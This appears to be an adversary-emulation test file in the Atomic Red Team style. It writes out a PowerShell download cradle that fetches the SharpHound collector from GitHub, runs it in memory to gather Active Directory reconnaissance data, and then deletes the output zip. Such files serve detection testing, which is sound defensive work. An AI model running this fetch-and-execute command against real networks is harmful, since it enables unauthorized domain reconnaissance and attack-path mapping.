#TechniqueName: Command and Scripting Interpreter: PowerShell
#AtomicTestName: Run Bloodhound from Memory using Download Cradle
#Language: ps1

#commands
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5


#cleanup_commands
Remove-Item $env:Temp\*BloodHound.zip -Force

